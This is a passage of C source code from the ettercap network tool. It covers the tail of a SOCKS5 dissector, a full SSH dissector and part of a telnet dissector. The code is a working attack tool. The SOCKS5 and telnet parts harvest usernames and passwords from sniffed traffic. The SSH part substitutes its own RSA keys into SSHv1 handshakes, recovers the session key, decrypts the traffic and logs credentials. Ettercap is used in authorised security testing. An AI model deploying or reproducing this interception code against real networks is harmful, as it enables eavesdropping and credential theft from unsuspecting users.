d_len + 1, sizeof(char)); memcpy(PACKET->DISSECTOR.user, ++ptr, d_len); /* Reach the password */ ptr += d_len; d_len = *ptr; /* Save the password (take care of the null termination) */ SAFE_CALLOC(PACKET->DISSECTOR.pass, d_len + 1, sizeof(char)); memcpy(PACKET->DISSECTOR.pass, ++ptr, d_len); DISSECT_MSG("SOCKS5 : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } dissect_wipe_session(PACKET, DISSECT_CODE(dissector_socks)); } } SAFE_FREE(ident); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_ssh.c000664 000000 000000 00000072631 13711276346 020054 0ustar00rootroot000000 000000 /* ettercap -- dissector ssh -- TCP 22 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* don't include kreberos. RH sux !! */ #define OPENSSL_NO_KRB5 1 #include #include #include #include #include #if (OPENSSL_VERSION_NUMBER >= 0x10100000L) #define HAVE_OPAQUE_RSA_DSA_DH 1 /* since 1.1.0 -pre5 */ #endif #define SMSG_PUBLIC_KEY 2 #define CMSG_SESSION_KEY 3 #define CMSG_USER 4 #define CMSG_AUTH_PASSWORD 9 #define CMSG_AUTH_RHOSTS 5 #define CMSG_AUTH_RSA 6 #define SMSG_SUCCESS 14 #define SMSG_FAILURE 15 #define CMSG_STDIN_DATA 16 #define SMSG_STDOUT_DATA 17 #define SMSG_STDERR_DATA 18 #define CMSG_REQUEST_COMPRESSION 37 #define SSH_CIPHER_NONE 0 #define SSH_CIPHER_3DES 3 #define SSH_CIPHER_BLOWFISH 6 /* My RSA keys */ typedef struct { RSA *myserverkey; RSA *myhostkey; u_int32 server_mod; u_int32 host_mod; BIGNUM *server_exp; BIGNUM *host_exp; struct ssh_my_key *next; } ssh_my_key; /* Session Key data */ typedef struct { RSA *serverkey; RSA *hostkey; ssh_my_key *ptrkey; void *key_state[2]; void (*decrypt)(u_char *src, u_char *dst, int len, void *state); struct stream_buf data_buffer[2]; #define MAX_USER_LEN 64 u_char user[MAX_USER_LEN + 1]; u_char status; #define WAITING_CLIENT_BANNER 1 #define WAITING_PUBLIC_KEY 2 #define WAITING_SESSION_KEY 3 #define WAITING_ENCRYPTED_PCK 4 u_char compression_status; #define NO_COMPRESSION 0 #define COMPRESSION_REQUEST 1 #define COMPRESSION_ON 2 } ssh_session_data; struct des3_state { DES_key_schedule k1, k2, k3; DES_cblock iv1, iv2, iv3; }; struct blowfish_state { struct bf_key_st key; u_char iv[8]; }; /* globals */ /* Pointer to our RSA key list */ ssh_my_key *ssh_conn_key = NULL; /* protos */ FUNC_DECODER(dissector_ssh); void ssh_init(void); static void put_bn(BIGNUM *bn, u_char **pp); static void get_bn(BIGNUM *bn, u_char **pp); static u_char *ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *serverkey_n); static void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key); static void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key); static void des3_decrypt(u_char *src, u_char *dst, int len, void *state); static void *des3_init(u_char *sesskey, int len); static void swap_bytes(const u_char *src, u_char *dst, int n); static void *blowfish_init(u_char *sesskey, int len); static void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state); static int32 read_packet(u_char **buffer, struct stream_buf *dbuf); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ssh_init(void) { dissect_add("ssh", APP_LAYER_TCP, 22, dissector_ssh); } FUNC_DECODER(dissector_ssh) { struct ec_session *s = NULL; ssh_session_data *session_data; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; u_int32 ssh_len, ssh_mod; u_char ssh_packet_type, *ptr, *key_to_put; #ifdef HAVE_OPAQUE_RSA_DSA_DH BIGNUM *h_n, *s_n, *m_h_n, *m_s_n; BIGNUM *h_e, *s_e, *m_h_e, *m_s_e; BIGNUM *h_d, *s_d, *m_h_d, *m_s_d; #endif /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_ssh)); /* Is this a brand new session ? * If the aggressive dissectors are * off performs only banner catching. */ if ((!EC_GBL_CONF->aggressive_dissectors || EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read) || session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); /* Create the session on first server's cleartext packet */ if(!memcmp(PACKET->DATA.data,"SSH-", 4) && FROM_SERVER("ssh", PACKET)) { /* Only if we are interested on key substitution */ if (EC_GBL_CONF->aggressive_dissectors && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) { dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_ssh)); SAFE_CALLOC(s->data, sizeof(ssh_session_data), 1); session_put(s); session_data =(ssh_session_data *)s->data; session_data->status = WAITING_CLIENT_BANNER; } /* Catch the version banner */ PACKET->DISSECTOR.banner = strdup((const char*)PACKET->DATA.data); /* remove the \n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\n')) != NULL ) *ptr = '\0'; } } else { /* The session exists */ session_data =(ssh_session_data *)s->data; SAFE_FREE(ident); /* If we are ready to decrypt packets */ if (session_data->status == WAITING_ENCRYPTED_PCK) { u_char direction, *crypted_packet = NULL, *clear_packet = NULL; u_int32 data_len; /* Check what key and stream buffer we have to use */ if(FROM_SERVER("ssh", PACKET)) direction = 0; else direction = 1; /* Add this packet to the stream */ streambuf_seq_add(&(session_data->data_buffer[direction]), PACKET); /* We are decrypting, so we'll arrange disp_data by our own */ PACKET->DATA.disp_len = 0; /* While there are packets to read from the stream */ while(read_packet(&crypted_packet, &(session_data->data_buffer[direction])) == E_SUCCESS) { ssh_len = pntol(crypted_packet); ssh_mod = 8 - (ssh_len % 8); /* SAFE_CALLOC is too drastic for errors */ if (ssh_len > INT16_MAX) { SAFE_FREE(crypted_packet); return NULL; } SAFE_CALLOC(clear_packet, ssh_len + ssh_mod, 1); /* Decrypt the packet (jumping over pck len) using correct key */ if (session_data->decrypt) session_data->decrypt(crypted_packet + 4, clear_packet, ssh_len + ssh_mod, session_data->key_state[direction]); if (session_data->compression_status == COMPRESSION_ON) { /* XXX Handle compressed packets */ } /* Catch packet type and slide to the data */ ptr = clear_packet + ssh_mod; ssh_packet_type = *ptr; ptr++; /* Catch data len and slide to the payload */ data_len = pntol(ptr); ptr += 4; /* USER */ if (ssh_packet_type == CMSG_USER) { DEBUG_MSG("\tDissector_ssh USER"); /* User will always be NULL terminated * (it's calloc'd MAX_USER_LEN + 1) */ memcpy(session_data->user, ptr, (data_len>MAX_USER_LEN) ? MAX_USER_LEN : data_len); /* AUTH_PASSWORD */ } else if (ssh_packet_type == CMSG_AUTH_PASSWORD) { DEBUG_MSG("\tDissector_ssh PASS"); /* avoid bof */ if (data_len > MAX_USER_LEN) { SAFE_FREE(clear_packet); SAFE_FREE(crypted_packet); return NULL; } if (data_len > 0) { SAFE_CALLOC(PACKET->DISSECTOR.pass, data_len + 1, 1); memcpy(PACKET->DISSECTOR.pass, ptr, data_len); } else PACKET->DISSECTOR.pass = strdup("(empty)"); PACKET->DISSECTOR.user = strdup((const char*)session_data->user); /* Surely NULL terminated */ DISSECT_MSG("SSH : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } else if (ssh_packet_type == CMSG_AUTH_RHOSTS) { DEBUG_MSG("\tDissector_ssh RHOSTS"); PACKET->DISSECTOR.user = strdup((const char*)session_data->user); /* XXX Do we need to catch more infos from this kind of packet? */ PACKET->DISSECTOR.pass = strdup("RHOSTS-AUTH\n"); DISSECT_MSG("SSH : %s:%d -> USER: %s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } else if (ssh_packet_type == CMSG_AUTH_RSA) { DEBUG_MSG("\tDissector_ssh RSA AUTH"); PACKET->DISSECTOR.user = strdup((const char*)session_data->user); PACKET->DISSECTOR.pass = strdup("RSA-AUTH\n"); DISSECT_MSG("SSH : %s:%d -> USER: %s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } else if (ssh_packet_type == CMSG_REQUEST_COMPRESSION) { session_data->compression_status = COMPRESSION_REQUEST; } else if (session_data->compression_status == COMPRESSION_REQUEST) { if (ssh_packet_type == SMSG_SUCCESS) { session_data->compression_status = COMPRESSION_ON; /* XXX We should notify top half */ } if (ssh_packet_type == SMSG_FAILURE) session_data->compression_status = NO_COMPRESSION; } /* These are readable packets so copy it in the DISPDATA */ if ((ssh_packet_type>=CMSG_STDIN_DATA && ssh_packet_type<=SMSG_STDERR_DATA) || ssh_packet_type == 4 || ssh_packet_type == 9) { u_char *temp_disp_data; /* Avoid int overflow or bogus data_len (realloc is too optimistic) */ if ((PACKET->DATA.disp_len + data_len + 1 < PACKET->DATA.disp_len) || (data_len > ssh_len)) { SAFE_FREE(clear_packet); SAFE_FREE(crypted_packet); return NULL; } /* Add this decrypted packet to the disp_data. * There can be more than one ssh packet in a tcp pck. * We use a temp buffer to not feed top half with a null * pointer to disp_data. */ temp_disp_data = (u_char *)realloc(PACKET->DATA.disp_data, PACKET->DATA.disp_len + data_len + 1); if (temp_disp_data == NULL) { SAFE_FREE(clear_packet); SAFE_FREE(crypted_packet); return NULL; } PACKET->DATA.disp_data = temp_disp_data; memcpy(PACKET->DATA.disp_data+PACKET->DATA.disp_len, ptr, data_len); PACKET->DATA.disp_len += data_len; } SAFE_FREE(clear_packet); SAFE_FREE(crypted_packet); } /* We are no longer interested on key stuff */ return NULL; } /* We are not ready to decrypt packets because * we are still waiting for some key stuff. */ /* We need the packet to be forwardable to mangle * key exchange. Otherwise wipe the session. */ if(!(PACKET->flags & PO_FORWARDABLE)) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_ssh)); return NULL; } /* Catch packet type and skip to data. * Doing this for client's cleartext * banner packet is safe too. */ ssh_len = pntol(PACKET->DATA.data); ssh_mod = 8 - (ssh_len % 8); ptr = PACKET->DATA.data + 4 + ssh_mod; ssh_packet_type = *ptr; ptr++; if(FROM_SERVER("ssh", PACKET)) { /* Server Packets (Public Key) */ /* Enter if we are waiting for PublicKey packet. * Enter even if we are waiting for SessionKey: * if the server sends the public key twice we have * to replace both. */ if ((session_data->status == WAITING_PUBLIC_KEY || session_data->status == WAITING_SESSION_KEY) && ssh_packet_type == SMSG_PUBLIC_KEY) { ssh_my_key **index_ssl; u_int32 server_mod, host_mod, cypher_mask, my_mask=0; BIGNUM *server_exp = NULL, *host_exp = NULL; /* Set the mask to 3DES or blowfish (if supported) */ cypher_mask = *(u_int32 *)(PACKET->DATA.data + PACKET->DATA.len - 12); cypher_mask = htonl(cypher_mask); if (cypher_mask & (1<DATA.data + PACKET->DATA.len - 12) = htonl(my_mask); /* Remember where to put the key */ ptr += 8; key_to_put = ptr; /* If it's the first time we catch the public key */ if (session_data->ptrkey == NULL) { /* Initialize RSA key structures (other fileds are set to 0) */ session_data->serverkey = RSA_new(); #ifdef HAVE_OPAQUE_RSA_DSA_DH s_n = BN_new(); s_e = BN_new(); RSA_set0_key(session_data->serverkey, s_n, s_e, s_d); #else session_data->serverkey->n = BN_new(); session_data->serverkey->e = BN_new(); #endif session_data->hostkey = RSA_new(); #ifdef HAVE_OPAQUE_RSA_DSA_DH h_n = BN_new(); h_e = BN_new(); RSA_set0_key(session_data->hostkey, h_n, h_e, h_d); #else session_data->hostkey->n = BN_new(); session_data->hostkey->e = BN_new(); #endif /* Get the RSA Key from the packet */ NS_GET32(server_mod,ptr); if (ptr + (server_mod/8) > PACKET->DATA.data + PACKET->DATA.len) { DEBUG_MSG("Dissector_ssh Bougs Server_Mod"); return NULL; } #ifdef HAVE_OPAQUE_RSA_DSA_DH RSA_get0_key(session_data->serverkey, (const BIGNUM**)&s_n, (const BIGNUM**)&s_e, (const BIGNUM**)&s_d); get_bn(s_e, &ptr); get_bn(s_n, &ptr); #else get_bn(session_data->serverkey->e, &ptr); get_bn(session_data->serverkey->n, &ptr); #endif NS_GET32(host_mod,ptr); if (ptr + (host_mod/8) > PACKET->DATA.data + PACKET->DATA.len) { DEBUG_MSG("Dissector_ssh Bougs Host_Mod"); return NULL; } #ifdef HAVE_OPAQUE_RSA_DSA_DH RSA_get0_key(session_data->hostkey, (const BIGNUM**)&h_n, (const BIGNUM**)&h_e, (const BIGNUM**)&h_d); get_bn(h_e, &ptr); get_bn(h_n, &ptr); #else get_bn(session_data->hostkey->e, &ptr); get_bn(session_data->hostkey->n, &ptr); #endif #ifdef HAVE_OPAQUE_RSA_DSA_DH server_exp = s_e; host_exp = h_e; #else BN_set_word(server_exp, *(session_data->serverkey->e->d)); BN_set_word(host_exp, *(session_data->hostkey->e->d)); #endif /* Check if we already have a suitable RSA key to substitute */ index_ssl = &ssh_conn_key; while(*index_ssl != NULL && ((*index_ssl)->server_mod != server_mod || (*index_ssl)->host_mod != host_mod || (*index_ssl)->server_exp != server_exp || (*index_ssl)->host_exp != host_exp)) index_ssl = (ssh_my_key **)&((*index_ssl)->next); /* ...otherwise generate it */ if (*index_ssl == NULL) { SAFE_CALLOC(*index_ssl, 1, sizeof(ssh_my_key)); /* Generate the new key */ (*index_ssl)->myserverkey = RSA_new(); if (!RSA_generate_key_ex((*index_ssl)->myserverkey, server_mod, server_exp, NULL)) { RSA_free((*index_ssl)->myserverkey); SAFE_FREE(*index_ssl); return NULL; } (*index_ssl)->myhostkey = RSA_new(); if (!RSA_generate_key_ex((*index_ssl)->myhostkey, host_mod, host_exp, NULL)) { RSA_free((*index_ssl)->myhostkey); SAFE_FREE(*index_ssl); return NULL; } (*index_ssl)->server_mod = server_mod; (*index_ssl)->host_mod = host_mod; (*index_ssl)->server_exp = server_exp; (*index_ssl)->host_exp = host_exp; (*index_ssl)->next = NULL; } /* Assign the key to the session */ session_data->ptrkey = *index_ssl; } /* Put our RSA key in the packet */ key_to_put+=4; #ifdef HAVE_OPAQUE_RSA_DSA_DH RSA_get0_key(session_data->ptrkey->myserverkey, (const BIGNUM**)&m_s_n, (const BIGNUM**)&m_s_e, (const BIGNUM**)&m_s_d); put_bn(m_s_e, &key_to_put); put_bn(m_s_n, &key_to_put); #else put_bn(session_data->ptrkey->myserverkey->e, &key_to_put); put_bn(session_data->ptrkey->myserverkey->n, &key_to_put); #endif key_to_put+=4; #ifdef HAVE_OPAQUE_RSA_DSA_DH RSA_get0_key(session_data->ptrkey->myhostkey, (const BIGNUM**)&m_h_n, (const BIGNUM**)&m_h_e, (const BIGNUM**)&m_h_d); put_bn(m_h_e, &key_to_put); put_bn(m_h_n, &key_to_put); #else put_bn(session_data->ptrkey->myhostkey->e, &key_to_put); put_bn(session_data->ptrkey->myhostkey->n, &key_to_put); #endif /* Recalculate SSH crc */ *(u_int32 *)(PACKET->DATA.data + PACKET->DATA.len - 4) = htonl(CRC_checksum(PACKET->DATA.data+4, PACKET->DATA.len-8, CRC_INIT_ZERO)); PACKET->flags |= PO_MODIFIED; session_data->status = WAITING_SESSION_KEY; } } else { /* Client Packets */ if (session_data->status == WAITING_CLIENT_BANNER) { /* Client Banner */ if (!memcmp(PACKET->DATA.data,"SSH-2",5)) { DEBUG_MSG("Dissector_ssh SSHv2"); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_ssh)); } else session_data->status = WAITING_PUBLIC_KEY; } else if (session_data->status == WAITING_SESSION_KEY && ssh_packet_type == CMSG_SESSION_KEY) { /* Ready to catch and modify SESSION_KEY */ u_char cookie[8], sesskey[32], session_id1[16], session_id2[16], cypher; u_char *temp_session_id; BIGNUM *enckey, *bn; u_int32 i; /* Get the cypher and the cookie */ cypher = *ptr; if (cypher != SSH_CIPHER_3DES && cypher != SSH_CIPHER_BLOWFISH) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_ssh)); return NULL; } memcpy(cookie, ++ptr, 8); ptr += 8; key_to_put = ptr; /* Calculate real session id and our fake session id */ #ifdef HAVE_OPAQUE_RSA_DSA_DH temp_session_id = ssh_session_id(cookie, h_n, s_n); #else temp_session_id = ssh_session_id(cookie, session_data->hostkey->n, session_data->serverkey->n); #endif if (temp_session_id) memcpy(session_id1, temp_session_id, 16); #ifdef HAVE_OPAQUE_RSA_DSA_DH temp_session_id=ssh_session_id(cookie, m_h_n, m_s_n); #else temp_session_id=ssh_session_id(cookie, session_data->ptrkey->myhostkey->n, session_data->ptrkey->myserverkey->n); #endif if (temp_session_id) memcpy(session_id2, temp_session_id, 16); /* Get the session key */ enckey = BN_new(); get_bn(enckey, &ptr); /* Decrypt session key */ #ifdef HAVE_OPAQUE_RSA_DSA_DH if (BN_cmp(m_s_n, m_h_n) > 0) { #else if (BN_cmp(session_data->ptrkey->myserverkey->n, session_data->ptrkey->myhostkey->n) > 0) { #endif rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myserverkey); rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myhostkey); } else { rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myhostkey); rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myserverkey); } BN_mask_bits(enckey, sizeof(sesskey) * 8); i = BN_num_bytes(enckey); memset(sesskey, 0, sizeof(sesskey)); BN_bn2bin(enckey, sesskey + sizeof(sesskey) - i); BN_clear_free(enckey); for (i = 0; i < 16; i++) sesskey[i] ^= session_id2[i]; /* Save SessionKey */ if (cypher == SSH_CIPHER_3DES) { session_data->key_state[0] = des3_init(sesskey, sizeof(sesskey)); session_data->key_state[1] = des3_init(sesskey, sizeof(sesskey)); session_data->decrypt = des3_decrypt; } else if (cypher == SSH_CIPHER_BLOWFISH) { session_data->key_state[0] = blowfish_init(sesskey, sizeof(sesskey)); session_data->key_state[1] = blowfish_init(sesskey, sizeof(sesskey)); session_data->decrypt = blowfish_decrypt; } /* Re-encrypt SessionKey with the real RSA key */ bn = BN_new(); BN_set_word(bn, 0); for (i = 0; i < sizeof(sesskey); i++) { BN_lshift(bn, bn, 8); if (i < 16) BN_add_word(bn, sesskey[i] ^ session_id1[i]); else BN_add_word(bn, sesskey[i]); } #ifdef HAVE_OPAQUE_RSA_DSA_DH if (BN_cmp(s_n, h_n) < 0) { #else if (BN_cmp(session_data->serverkey->n, session_data->hostkey->n) < 0) { #endif rsa_public_encrypt(bn, bn, session_data->serverkey); rsa_public_encrypt(bn, bn, session_data->hostkey); } else { rsa_public_encrypt(bn, bn, session_data->hostkey); rsa_public_encrypt(bn, bn, session_data->serverkey); } /* Clear the session */ RSA_free(session_data->serverkey); RSA_free(session_data->hostkey); /* Put right Session Key in the packet */ put_bn(bn, &key_to_put); BN_clear_free(bn); /* Re-calculate SSH crc */ *(u_int32 *)(PACKET->DATA.data + PACKET->DATA.len - 4) = htonl(CRC_checksum(PACKET->DATA.data+4, PACKET->DATA.len-8, CRC_INIT_ZERO)); /* XXX Here we should notify the top half that the * connection is decrypted */ /* Initialize the stream buffers for decryption */ streambuf_init(&(session_data->data_buffer[0])); streambuf_init(&(session_data->data_buffer[1])); PACKET->flags |= PO_MODIFIED; session_data->status = WAITING_ENCRYPTED_PCK; } } } return NULL; } /* Read a crypted packet from the stream. * The buffer is dynamically allocated, so * calling function has to free it. */ static int32 read_packet(u_char **buffer, struct stream_buf *dbuf) { int32 length, mod; /* Read packet length and calculate modulus */ if (streambuf_read(dbuf, (u_char *)&length, 4, STREAM_ATOMIC) == -E_INVALID) return -E_INVALID; length = ntohl(length); mod = 8 - (length % 8); /* Allocate the buffer and read the whole packet * SAFE_CALLOC is not good to handle errors. */ *buffer = (u_char *)malloc(length + mod + 4); if (*buffer == NULL) return -E_INVALID; if (streambuf_get(dbuf, *buffer, length + mod + 4, STREAM_ATOMIC) == -E_INVALID) { SAFE_FREE(*buffer); return -E_INVALID; } return E_SUCCESS; } /* 3DES and blowfish stuff - Thanks to Dug Song ;) */ static void *des3_init(u_char *sesskey, int len) { struct des3_state *state; state = malloc(sizeof(*state)); if (state == NULL) /* oops, couldn't allocate memory */ return NULL; DES_set_key((void *)sesskey, &(state->k1)); DES_set_key((void *)(sesskey + 8), &(state->k2)); if (len <= 16) DES_set_key((void *)sesskey, &(state->k3)); else DES_set_key((void *)(sesskey + 16), &(state->k3)); memset(state->iv1, 0, 8); memset(state->iv2, 0, 8); memset(state->iv3, 0, 8); return (state); } static void des3_decrypt(u_char *src, u_char *dst, int len, void *state) { struct des3_state *dstate; dstate = (struct des3_state *)state; memcpy(dstate->iv1, dstate->iv2, 8); DES_ncbc_encrypt(src, dst, len, &(dstate->k3), &dstate->iv3, DES_DECRYPT); DES_ncbc_encrypt(dst, dst, len, &(dstate->k2), &dstate->iv2, DES_ENCRYPT); DES_ncbc_encrypt(dst, dst, len, &(dstate->k1), &dstate->iv1, DES_DECRYPT); } static void swap_bytes(const u_char *src, u_char *dst, int n) { char c[4]; for (n = n / 4; n > 0; n--) { c[3] = *src++; c[2] = *src++; c[1] = *src++; c[0] = *src++; *dst++ = c[0]; *dst++ = c[1]; *dst++ = c[2]; *dst++ = c[3]; } } static void *blowfish_init(u_char *sesskey, int len) { struct blowfish_state *state; state = malloc(sizeof(*state)); if (state == NULL) /* oops, couldn't allocate memory */ return NULL; BF_set_key(&state->key, len, sesskey); memset(state->iv, 0, 8); return (state); } static void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state) { struct blowfish_state *dstate; dstate = (struct blowfish_state *)state; swap_bytes(src, dst, len); BF_cbc_encrypt((void *)dst, dst, len, &dstate->key, dstate->iv, BF_DECRYPT); swap_bytes(dst, dst, len); } static void put_bn(BIGNUM *bn, u_char **pp) { short i; i = BN_num_bits(bn); NS_PUT16(i, *pp); *pp+=BN_bn2bin(bn, *pp); } static void get_bn(BIGNUM *bn, u_char **pp) { short i; NS_GET16(i, *pp); i = ((i + 7) / 8); BN_bin2bn(*pp, i, bn); *pp += i; } static u_char *ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *serverkey_n) { static u_char sessid[16]; u_int i, j; u_char *p; i = BN_num_bytes(hostkey_n); j = BN_num_bytes(serverkey_n); if ((p = malloc(i + j + 8)) == NULL) return (NULL); BN_bn2bin(hostkey_n, p); BN_bn2bin(serverkey_n, p + i); memcpy(p + i + j, cookie, 8); MD5(p, i + j + 8, sessid); free(p); return (sessid); } static void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int32 len, ilen, olen; #ifdef HAVE_OPAQUE_RSA_DSA_DH const BIGNUM *n; const BIGNUM *e; const BIGNUM *d; RSA_get0_key(key, &n, &e, &d); olen = BN_num_bytes(n); #else olen = BN_num_bytes(key->n); #endif outbuf = malloc(olen); if (outbuf == NULL) /* oops, couldn't allocate memory */ return; ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (inbuf == NULL) { /* oops, couldn't allocate memory */ SAFE_FREE(outbuf); return; } BN_bn2bin(in, inbuf); len = RSA_public_encrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING); if (len != -1) BN_bin2bn(outbuf, len, out); free(outbuf); free(inbuf); } static void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int32 len, ilen, olen; #ifdef HAVE_OPAQUE_RSA_DSA_DH const BIGNUM *n; const BIGNUM *e; const BIGNUM *d; RSA_get0_key(key, &n, &e, &d); olen = BN_num_bytes(n); #else olen = BN_num_bytes(key->n); #endif outbuf = malloc(olen); if (outbuf == NULL) /* oops, couldn't allocate memory */ return; ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (inbuf == NULL) { /* oops, couldn't allocate memory */ SAFE_FREE(outbuf); return; } BN_bn2bin(in, inbuf); len = RSA_private_decrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING); if (len != -1) BN_bin2bn(outbuf, len, out); free(outbuf); free(inbuf); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_telnet.c000664 000000 000000 00000024717 13711276346 020554 0ustar00rootroot000000 000000 /* ettercap -- dissector TELNET -- TCP 23 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_telnet); void telnet_init(void); static void skip_telnet_command(u_char **ptr, u_char *end); static void convert_zeros(u_char *ptr, u_char *end); static int match_login_regex(const char *ptr); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init telnet_init(void) { dissect_add("telnet", APP_LAYER_TCP, 23, dissector_telnet); sslw_dissect_add("telnets", 992, dissector_telnet, SSL_ENABLED); } /* * telnet sends characters one per packet, * so we have to make sessions to collect * the string among the packet stram. * * the telnet collector collects user and pass only if * a session is present. * the session is created looking at the server response * and searching for "login:", "failed" ecc... so we will * collect even failed logins. */ FUNC_DECODER(dissector_telnet) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("telnet", s, dissector_telnet); CREATE_SESSION_ON_SYN_ACK("telnets", s, dissector_telnet); /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* skip the telnet commands, we are interested only in readable data */ skip_telnet_command(&ptr, end); /* the packet was made only by commands, skip it */ if (ptr >= end) return NULL; DEBUG_MSG("TELNET --> TCP dissector_telnet"); /* search if there are 0x00 char and covert them to spaces. * some OS (BSDI) send zeroes into the packet, so we cant use * string functions */ convert_zeros(ptr, end); /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_telnet)); /* is the message from the server or the client ? */ if (FROM_SERVER("telnet", PACKET) || FROM_SERVER("telnets", PACKET)) { /* start the collecting process when a "reserved" word is seen */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { if (match_login_regex((const char*)ptr)) { DEBUG_MSG("\tdissector_telnet - BEGIN"); /* create the session to begin the collection */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_telnet)); /* use this value to remember to not collect the banner again */ s->data = strdup("\xe7\x7e"); session_put(s); return NULL; } } } else { /* retrieve the session */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { /* sanity check */ if (s->data == NULL) return NULL; /* if the collecting process has to be initiated */ if (!strcmp(s->data, "\xe7\x7e")) { /* the characters are not printable, skip them */ if (!isprint((int)*ptr)) { SAFE_FREE(ident); return NULL; } DEBUG_MSG("\tdissector_telnet - FIRST CHAR"); /* save the first packet */ s->data = strdup((const char*)ptr); /* collect the subsequent packets */ } else { size_t i, stringlen; u_char *p; u_char str[strlen(s->data) + PACKET->DATA.disp_len + 2]; memset(str, 0, sizeof(str)); /* concat the char to the previous one */ snprintf((char*)str, strlen(s->data) + PACKET->DATA.disp_len + 2, "%s%s", (char *)s->data, ptr); /* parse the string for backspaces and erase as wanted */ stringlen = strlen((const char*)str); for (p = str, i = 0; i < stringlen; i++) { if (str[i] == '\b' || str[i] == 0x7f) { p--; } else { *p = str[i]; p++; } } *p = '\0'; /* save the new string */ SAFE_FREE(s->data); p = s->data = strdup((const char*)str); /* terminate the string at \n */ if ((p = (u_char*)strchr(s->data, '\n')) != NULL) *p = '\0'; /* * the user input is terminated * check if it was the password by checking * the presence of \r in the string * we store "user\rpass\r" and then we split it */ if (strchr((const char*)ptr, '\r') || strchr((const char*)ptr, '\n')) { /* there is the \r and it is not the last char */ if ( ((ptr = (u_char*)strchr(s->data, '\r')) || (ptr = (u_char*)strchr(s->data, '\n'))) && ptr != s->data + strlen(s->data) - 1 ) { /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.user, '\r')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.pass = strdup((const char*)ptr + 1); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* display the message */ DISSECT_MSG("TELNET : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); /* delete the session to stop the collection */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_telnet)); } SAFE_FREE(ident); return NULL; 